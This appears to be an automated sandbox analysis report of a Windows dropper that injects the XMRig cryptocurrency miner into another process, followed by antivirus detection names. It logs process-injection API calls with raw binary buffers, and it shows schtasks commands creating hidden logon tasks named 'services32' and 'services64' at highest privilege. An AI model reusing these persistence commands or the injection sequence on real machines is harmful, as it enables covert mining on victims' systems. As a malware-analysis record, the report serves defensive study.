WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: base_address: 0x0000000140001000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: base_address: 0x0000000140367000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: base_address: 0x00000001404a0000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: base_address: 0x0000000140753000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: HÐ%ÀÿHÁÊ âÀÿÄãûðÐ %ÀÿâÀÿfffffSUWVATAUAVAWHìPót$@ó\|$0óDD$ óDL$óD$HìPóD\$@óDd$0óDl$ óDt$óD<$QHHzHÅHÁè %ÀÿÿIðIÙHÅHÁÍ M3ÀM3ÉM3ÒM3ÛM3äM3íM3öM3ÿHIxfD(AHfD(IXfD(QhfD(YxfD(-fD(5fD(=HÐ%ÀÿHÁÊ âÀÿHì(Ç$ÀÇD$À¿ÇD$ÀßÇD$ÀÿÇD$ ÿÿÿÿëdfffffffffffffffffffffÀÿÿÿÿÀÿÿÿÿððH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QH¹QHÄëfffffffHHL$L3L3IL3QL3YL3a L3i(L3q0L3y8HHL$óæóæIóæQóæYóæa óæi(óæq0óæy8fATåfATífATõfATýfAVæfAVîfAVöfAVþHHL$L3L3IL3QL3YL3a L3i(L3q0L3y8HHL$óæóæIóæQóæYóæa óæi(óæq0óæy8ÈX¢æÐÈP¢îÐÈH¢öÐÈ@¢þÐÍáÀÿÿL3HÁÍ H3èÕâÀÿÿL3LL3TL3\L3d L3l(L3t0L3\|8HìÈH\$@LD$8LL$0LT$(L\$ Ld$Ll$Lt$L<$HÁÍ H3èHÝHÁë&ãÿÿÿH\$@L3D$8L3L$0L3T$(L3\$ L3d$L3l$L3t$L3<$HÄÈHL$LLILQLYLa Li(Lq0Ly8HL$fWÄfWÍfWÖfWßf)f)If)Q f)Y0DSUWVATAUAVAWH9HòIèAQ HÝèÞLLNLVL^Lf Ln(Lv0L~8HÅHÆ@H;,$rÈAYA_A^A]A\^_][Ãffffffffffffff@SUWVATAUAVAWHìó$óL$óT$ ó\$0ód$@ól$Pót$`ó\|$póD$óD$óD$ óD$°óD¤$ÀóD¬$ÐóD´$àóD¼$ðH9HòIèAQHì(é-L-ôQXü¡õY FØÂ8ßp§\I"¿¹&b%MIìªÎ¹ï7x-æltV/Nå,¶÷;fffffffffffffffffffffDF@ÀHÝHãÿÿ?HÁãHßHEH%ÿÿ?HÁàHÇH$HEH%ÿÿ?HÁàHÇHD$HEH%ÿÿ?HÁàHÇHD$HEH%ÿÿ?HÁàHÇHD$LEL¯ïþÿÿL ðþÿÿM3ÈLîþÿÿM3ÐLìþÿÿM3ØL%êþÿÿM3àL-èþÿÿM3èL5æþÿÿM3ðL=äþÿÿM3øHl$ Äâ}D$ ÅýÔmþÿÿÄâ} þÿÿÅ½sÐ ÅµsÑ Å}ôÑÅ5ôØÅ½ôÁÄÁ%só Åýsð ÄA-ÔÓÅÔÀÄâ} aþÿÿÅýïÉÄâ}\þÿÿÅýïÒÄâ}WþÿÿÅýïÛÄâ}%RþÿÿÅýïäÄâ}-MþÿÿÅýïíÄâ}5HþÿÿÅýïöÄâ}=CþÿÿÅýïÿÄb}=öýÿÿÄÁ s÷LÅ}lÁLNÅmlËLVÅ]lÕL^ÅMlßLf Å}máLn(ÅmmëLv0Å]mõL~8ÅMmÿÄÃ=FÁ ÄÃ-FË ÅþF@ÅþN`ÄÃFÕ ÄÃ Fß ÅþÅþ ÄÃ=Fá1ÄÃ-Fë1Åþ¦ÀÅþ®àÄÃFõ1ÄÃ Fÿ1Åþ¶Åþ¾ HÅHÆ@H;l$(HÄ(AYóo$óoL$óoT$ óo\$0óod$@óol$Póot$`óo\|$póDo$óDo$óDo$ óDo$°óDo¤$ÀóDo¬$ÐóDo´$àóDo¼$ðÅøwHÄA_A^A]A\^_][ÃHì(H$Å~t$HD$(H\$0HL$8HT$@Å~oÅ~oÅ~oÅ~oÄA=láÄA-lëÄCFõ ÄÁ}ïÆÄCFõ1ÄÁmïÖÄA=máÄA-mëÄCFõ ÄÁuïÎÄCFõ1ÄÁeïÞÅ~o@ Å~oK Å~oQ Å~oZ ÄA=láÄA-lëÄCFõ ÄÁ]ïæÄCFõ1ÄÁMïöÄA=máÄA-mëÄCFõ ÄÁUïîÄCFõ1ÄÁEïþH$Å~ot$HÄ(Åþ$H$H%ÿÿ?HÁàHÇH$HD$H%ÿÿ?HÁàHÇHD$HD$H%ÿÿ?HÁàHÇHD$HD$H%ÿÿ?HÁàHÇHD$HÄ(YLLILQLYLa Li(Lq0Ly8fA@fIPfQ`fYpHI@fa@fiPfq`fypóDo<$óDot$óDol$ óDod$0óDo\$@HÄPóDo$óDoL$óDoD$ óo\|$0óot$@HÄPA_A^A]A\^_][ÃfffffffffffffffffL3L3KL3SL3[L3c L3k(L3s0L3{8Hãÿÿ?HÁãHßfffffffLCHãÿÿ?HÁãHßL¯cL dM3ÈLbM3ÐL`M3ØL%^M3àL-\M3èL5ZM3ðL=XM3øéXffffffff-L-ôQXü¡õY FØÂ8ßp§\I"¿¹&b%MIìªÎ¹ï7x-æltV*/Nå,¶÷;ºLÁ3ÀH½ÉHÓâI÷ðÃ base_address: 0x0000000140775000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: ÅøwH\$Ht$H\|$UATAUAVAWHìPót$@ó\|$0óDD$ óDL$óD$HìPóD\$@óDd$0óDl$ óDt$óD<$Hì@Hl$@HåàÅùïÀ3ÿÇELâÇE LòÇE IÁîAäÇEMèÆE HñßÅýE ÅýE@ÅýE`ÅýÅý ÅýÀÅýàMöt>¶DHM HÁHH1L{Hûu HM èñHûHÇIEÇHÆHØIîuÂH×MätLÇ¶2HÿÂÄâ¹÷ÈHùIÀI;Ôrè¶DHU HÂ¹JåÄâù÷ÉH3 ¸HÁà?H3ÏH H1EhHM èxÅüE ÄÁ\|EÅøwHÄ@óDo<$óDot$óDol$ óDod$0óDo\$@HÄPóDo$óDoL$óDoD$ óo\|$0óot$@HÄPA_A^A]A\]H\$Ht$H\|$ÃLL ÖL/¸HI`Äâ}YA ÅþoI¨ÅþoQÈÅþoYèÅþoaÅþoi(ÅþoqHfÅ}pêNÅUïãÅ]ïÎÅïáÄAïáÄCýÜÅïêÄÃýýNÄÁ=sÔ?ÄAÔÌÄA=ëÁÄCýø9ÄA=ïóÄCýöÅïèÅïïÄÁEsÕ?ÄAÔÅÅ=ëÇÄÁmïÖÄÁ}ïÆÄCøÀÄC%ÝÄAïûÄBíGP ÄÂíEQ ÄÁmëÒÄÁeïßÄBåGXàÄÂåEYàÄÁeëÛÄÁ]ïçÄBÝG ÄÂÝE!ÄÁ]ëäÄÁUïïÄBÕGh ÄÂÕEi ÄÁUëíÄÁMï÷ÄcýÒÄcýÛÄBÍGp@ÄBÍEA@ÄA=ëÆÄÁuïÏÄcýäÄcýírÄBõGxÀÄBõEIÀÄA5ëÏÄÁ sØÄÁ=ßþÄÃ5ÝÄC%ùÄÃ-ëÄC5òÄÃeÛ0ÄCü0ÄÃUé0ÄC õ0ÄÃeÜÀÄCýÀÄÃUíÀÄC óÀÄÁeßßÄÁUßîÄÃñÄC-üÄÁeïÚÄÃMò0ÄCû0ÄÁUïìÄÃMóÀÄCùÀÄÁMß÷ÄÁMïõÄÃýàÄc]ø0ÄÃýÈ9ÄãuÈÀÄÁußÏÄÃ%ÔÄCóÄÃmÕ0ÄC ò0ÄÃmÒÀÄC ôÀÄÁmßÖÄÁmïÑÄãýÿÄãýÛÄãýíÄãýörÄÃâÄCõÄÃ]ä0ÄC ñ0ÄÃ]áÀÄC òÀÄÁ]ßæÅýïÇÄÁuïÈÄÁ]ïãÄÁ}ïMR ÿÈ²ýÿÿÄáù~A ÅþI¨ÅþQÈÅþYèÅþaÅþi(ÅþqHÃfffff$)>-8' =7,+=.?$%:6 8>1',+2 base_address: 0x0000000140776000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: base_address: 0x0000000140777000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: base_address: 0x0000000140779000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: `Û2Û2aÛ2oÛ2¨Û2°Û2ÀÛ2ÐÛ2hÛ2Ü2Ü2Û2 Ü2èÛ20Ü2PÜ2Û2.à2+à2Wà2'à24à2Dà2Tà2$à2\à28à2pà2`à20à2@à2Pà2 à2xà2 base_address: 0x000000014077b000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: 8Ph Àw0Ãw}4VS_VERSION_INFO½ïþ?êStringFileInfoÆ000004b0<CompanyNamewww.xmrig.com@FileDescriptionXMRig miner.FileVersion6.15.2h"LegalCopyrightCopyright (C) 2016-2021 xmrig.com< OriginalFilenamexmrig.exe,ProductNameXMRig2ProductVersion6.15.2DVarFileInfo$Translation°<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x000000014077c000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: base_address: 0x000000014077d000 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
NtGetContextThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x000000000000047c	1	0
WriteProcessMemory Nov. 4, 2021, 3:28 p.m.	buffer: @ base_address: 0x000007fffffd5010 process_identifier: 2796 process_handle: 0x0000000000000480	1	1
NtSetContextThread Nov. 4, 2021, 3:28 p.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5371917304 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 2226440 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1997522176 registers.rdx: 8796092846080 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x000000000000047c process_identifier: 2796	1	0
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x000000000000047c suspend_count: 1 process_identifier: 2796	1	0
NtResumeThread Nov. 4, 2021, 3:27 p.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 2948	1	0
NtResumeThread Nov. 4, 2021, 3:27 p.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2948	1	0
NtResumeThread Nov. 4, 2021, 3:27 p.m.	thread_handle: 0x000000000000021c suspend_count: 1 process_identifier: 2948	1	0
CreateProcessInternalW Nov. 4, 2021, 3:27 p.m.	thread_identifier: 2364 thread_handle: 0x00000000000003a4 process_identifier: 2372 current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003ac	1	1
CreateProcessInternalW Nov. 4, 2021, 3:28 p.m.	thread_identifier: 2424 thread_handle: 0x00000000000003d4 process_identifier: 2480 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\services32.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\services32.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\services32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003e8	1	1
CreateProcessInternalW Nov. 4, 2021, 3:27 p.m.	thread_identifier: 2140 thread_handle: 0x0000000000000060 process_identifier: 2144 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
CreateProcessInternalW Nov. 4, 2021, 3:27 p.m.	thread_identifier: 2492 thread_handle: 0x0000000000000060 process_identifier: 2188 current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0 filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x0000000000000198 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x00000000000001e8 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 2480	1	0
NtResumeThread Nov. 4, 2021, 3:28 p.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2480	1	0

File has been identified by 43 AntiVirus engines on VirusTotal as malicious (43 events)

Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
FireEye	Generic.mg.8b1011bf4b9dc38d
ALYac	Trojan.GenericKD.47150763
Cylance	Unsafe
K7AntiVirus	Riskware ( 0040eff71 )
Alibaba	TrojanDropper:Win32/dropper.ali1003001
K7GW	Riskware ( 0040eff71 )
Cybereason	malicious.f4b9dc
Symantec	Trojan.Gen.2
ESET-NOD32	a variant of Win64/Packed.Enigma.CA
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Packed.Dorifel-9892630-0
Kaspersky	Trojan-Ransom.Win32.Encoder.oag
BitDefender	Trojan.GenericKD.37941637
MicroWorld-eScan	Trojan.GenericKD.37941637
Avast	Win64:Malware-gen
Ad-Aware	Trojan.GenericKD.37941637
Sophos	Generic PUA JN (PUA)
DrWeb	Trojan.MulDrop18.43403
TrendMicro	TROJ_GEN.R002C0WJJ21
McAfee-GW-Edition	BehavesLike.Win32.Generic.wc
Emsisoft	Trojan.GenericKD.47150763 (B)
Ikarus	Trojan.Win32.CoinMiner
Webroot	W32.Trojan.Gen
Avira	TR/Tasker.csjup
Antiy-AVL	Trojan/Generic.ASMalwS.34C2AAC
Kingsoft	Win32.Troj.Undef.(kcloud)
Gridinsoft	Trojan.Win32.Packed.ns
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ViRobot	Trojan.Win32.Z.Tasker.3323018
GData	Trojan.GenericKD.37941637
McAfee	Artemis!8B1011BF4B9D
MAX	malware (ai score=86)
VBA32	Trojan.Tasker
Malwarebytes	Trojan.Dropper
Zoner	Probably Heur.ExeHeaderH
SentinelOne	Static AI - Suspicious SFX
Fortinet	PossibleThreat.MU
AVG	Win64:Malware-gen
Panda	Trj/CI.A
Qihoo-360	Win32/Heur.Generic.HwYDhOcA

svchost.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All